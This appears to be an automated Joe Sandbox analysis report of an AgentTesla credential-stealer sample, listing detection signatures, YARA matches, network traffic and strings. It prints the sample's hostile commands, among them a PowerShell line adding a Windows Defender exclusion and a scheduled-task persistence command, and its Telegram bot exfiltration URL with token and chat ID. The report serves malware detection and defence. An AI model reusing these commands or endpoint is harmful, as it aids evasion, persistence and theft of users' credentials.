Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
wKQpOZ58Gl

Overview

General Information

Sample Name:wKQpOZ58Gl (renamed file extension from none to exe)
Analysis ID:679221
MD5:f7c9cf1410373a60a5c5a5e02aa4bd3c
SHA1:97cf7689f3b6dfd0efd37e7f16aa1bd2cfe537de
SHA256:b5a23c2ef617a9a0b87f82ebc9f6c2c892a179a53bd35ce725be92c68465b245
Tags:exe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Yara detected Generic Downloader
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • wKQpOZ58Gl.exe (PID: 3676 cmdline: "C:\Users\user\Desktop\wKQpOZ58Gl.exe" MD5: F7C9CF1410373A60A5C5A5E02AA4BD3C)
    • powershell.exe (PID: 6088 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\kqruryFrIFc.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6124 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\kqruryFrIFc" /XML "C:\Users\user\AppData\Local\Temp\tmp92BC.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • wKQpOZ58Gl.exe (PID: 3276 cmdline: C:\Users\user\Desktop\wKQpOZ58Gl.exe MD5: F7C9CF1410373A60A5C5A5E02AA4BD3C)
    • wKQpOZ58Gl.exe (PID: 3760 cmdline: C:\Users\user\Desktop\wKQpOZ58Gl.exe MD5: F7C9CF1410373A60A5C5A5E02AA4BD3C)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1428355250", "Chat URL": "https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocument"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
      • 0x300eb:$a13: get_DnsResolver
      • 0x2e909:$a20: get_LastAccessed
      • 0x30a7f:$a27: set_InternalServerPort
      • 0x30d9b:$a30: set_GuidMasterKey
      • 0x2ea10:$a33: get_Clipboard
      • 0x2ea1e:$a34: get_Keyboard
      • 0x2fd1b:$a35: get_ShiftKeyDown
      • 0x2fd2c:$a36: get_AltKeyDown
      • 0x2ea2b:$a37: get_Password
      • 0x2f4cb:$a38: get_PasswordHash
      • 0x304eb:$a39: get_DefaultCredentials
      00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Click to see the 13 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.wKQpOZ58Gl.exe.4084120.9.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            0.2.wKQpOZ58Gl.exe.4084120.9.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              0.2.wKQpOZ58Gl.exe.4084120.9.unpackMALWARE_Win_AgentTeslaV3AgentTeslaV3 infostealer payloadditekSHen
              • 0x30e60:$s10: logins
              • 0x308c7:$s11: credential
              • 0x2ce10:$g1: get_Clipboard
              • 0x2ce1e:$g2: get_Keyboard
              • 0x2ce2b:$g3: get_Password
              • 0x2e10b:$g4: get_CtrlKeyDown
              • 0x2e11b:$g5: get_ShiftKeyDown
              • 0x2e12c:$g6: get_AltKeyDown
              0.2.wKQpOZ58Gl.exe.4084120.9.unpackWindows_Trojan_AgentTesla_d3ac2b2funknownunknown
              • 0x2e4eb:$a13: get_DnsResolver
              • 0x2cd09:$a20: get_LastAccessed
              • 0x2ee7f:$a27: set_InternalServerPort
              • 0x2f19b:$a30: set_GuidMasterKey
              • 0x2ce10:$a33: get_Clipboard
              • 0x2ce1e:$a34: get_Keyboard
              • 0x2e11b:$a35: get_ShiftKeyDown
              • 0x2e12c:$a36: get_AltKeyDown
              • 0x2ce2b:$a37: get_Password
              • 0x2d8cb:$a38: get_PasswordHash
              • 0x2e8eb:$a39: get_DefaultCredentials
              0.2.wKQpOZ58Gl.exe.404f900.7.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                Click to see the 23 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:192.168.2.6149.154.167.220497834432851779 08/05/22-12:24:11.625878
                SID:2851779
                Source Port:49783
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: wKQpOZ58Gl.exeVirustotal: Detection: 57%Perma Link
                Source: wKQpOZ58Gl.exeMetadefender: Detection: 25%Perma Link
                Source: wKQpOZ58Gl.exeReversingLabs: Detection: 69%
                Antivirus / Scanner detection for submitted sample
                Source: wKQpOZ58Gl.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\kqruryFrIFc.exeAvira: detection malicious, Label: TR/AD.AgentTesla.gcmza
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\kqruryFrIFc.exeVirustotal: Detection: 57%Perma Link
                Source: C:\Users\user\AppData\Roaming\kqruryFrIFc.exeMetadefender: Detection: 25%Perma Link
                Source: C:\Users\user\AppData\Roaming\kqruryFrIFc.exeReversingLabs: Detection: 69%
                Machine Learning detection for sample
                Source: wKQpOZ58Gl.exeJoe Sandbox ML: detected
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\kqruryFrIFc.exeJoe Sandbox ML: detected
                Source: 14.0.wKQpOZ58Gl.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                Source: 0.2.wKQpOZ58Gl.exe.4084120.9.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1428355250", "Chat URL": "https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocument"}
                Source: wKQpOZ58Gl.exe.3760.14.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendMessage"}
                Source: wKQpOZ58Gl.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49783 version: TLS 1.2
                Source: wKQpOZ58Gl.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.6:49783 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.wKQpOZ58Gl.exe.4084120.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.wKQpOZ58Gl.exe.404f900.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.wKQpOZ58Gl.exe.40186e0.8.raw.unpack, type: UNPACKEDPE
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: POST /bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da76e30dae4492Host: api.telegram.orgContent-Length: 1019Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da76e3c93cca40Host: api.telegram.orgContent-Length: 1900Expect: 100-continue
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                Source: wKQpOZ58Gl.exe, kqruryFrIFc.exe.0.drString found in binary or memory: =Are you sure you want to exit?ExitWhttps://github.com/princ3od/MaterialSurfaceKhttps://www.linkedin.com/in/princ3od/%princ3od@gmail.com]My email has been already copied to clipboard! equals www.linkedin.com (Linkedin)
                Source: wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
                Source: wKQpOZ58Gl.exe, 0000000E.00000002.639326716.0000000002C66000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000002.639615093.0000000002C9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000002.639326716.0000000002C66000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000002.639182904.0000000002C49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dhp6cb4d3QXSx5sRl.net
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
                Source: wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sOkRpA.com
                Source: wKQpOZ58Gl.exe, 00000000.00000002.441112036.000000000272A000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000002.639234728.0000000002C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: wKQpOZ58Gl.exe, 00000000.00000002.455171417.00000000065B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%
                Source: wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org%%startupfolder%
                Source: wKQpOZ58Gl.exe, 0000000E.00000002.639234728.0000000002C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: wKQpOZ58Gl.exe, 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmp, wKQpOZ58Gl.exe, 0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/
                Source: wKQpOZ58Gl.exe, 0000000E.00000002.639234728.0000000002C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocument
                Source: wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocumentdocument-----
                Source: wKQpOZ58Gl.exe, 0000000E.00000002.639234728.0000000002C51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org4
                Source: wKQpOZ58Gl.exe, 0000000E.00000002.639615093.0000000002C9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgD8
                Source: wKQpOZ58Gl.exe, kqruryFrIFc.exe.0.drString found in binary or memory: https://github.com/princ3od/MaterialSurfaceKhttps://www.linkedin.com/in/princ3od/%princ3od
                Source: wKQpOZ58Gl.exe, 0000000E.00000002.633873650.0000000002901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
                Source: unknownHTTP traffic detected: POST /bot5589784704:AAHKB3hx6EncDiLmSpjVqiBsp072Mevw-S8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da76e30dae4492Host: api.telegram.orgContent-Length: 1019Expect: 100-continueConnection: Keep-Alive
                Source: unknownDNS traffic detected: queries for: api.telegram.org
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49783 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Installs a global keyboard hook
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\wKQpOZ58Gl.exe
                Source: wKQpOZ58Gl.exe, 00000000.00000002.436014526.000000000074B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                Source: C:\Users\user\Desktop\wKQpOZ58Gl.exeWindow created: window name: CLIPBRDWNDCLASS

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.wKQpOZ58Gl.exe.4084120.9.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.wKQpOZ58Gl.exe.4084120.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.wKQpOZ58Gl.exe.404f900.7.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.wKQpOZ58Gl.exe.404f900.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.wKQpOZ58Gl.exe.4084120.9.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.wKQpOZ58Gl.exe.4084120.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.wKQpOZ58Gl.exe.404f900.7.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.wKQpOZ58Gl.exe.404f900.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0.2.wKQpOZ58Gl.exe.40186e0.8.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 0.2.wKQpOZ58Gl.exe.40186e0.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: wKQpOZ58Gl.exe PID: 3676, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: wKQpOZ58Gl.exe PID: 3760, type: MEMORYSTRMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                .NET source code contains very large array initializations
                Source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bBACE69AFu002d4266u002d41D0u002d90ECu002d726D46EDE141u007d/ED527976u002d56C3u002d4852u002dB8A5u002d4D38F8259308.csLarge array initialization: .cctor: array initializer size 11689
                Source: wKQpOZ58Gl.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.wKQpOZ58Gl.exe.4084120.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.wKQpOZ58Gl.exe.4084120.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.wKQpOZ58Gl.exe.404f900.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.wKQpOZ58Gl.exe.404f900.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 14.0.wKQpOZ58Gl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.wKQpOZ58Gl.exe.4084120.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.wKQpOZ58Gl.exe.4084120.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.wKQpOZ58Gl.exe.404f900.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.wKQpOZ58Gl.exe.404f900.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0.2.wKQpOZ58Gl.exe.40186e0.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 0.2.wKQpOZ58Gl.exe.40186e0.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 0000000E.00000000.431826209.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000000.00000002.447462860.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
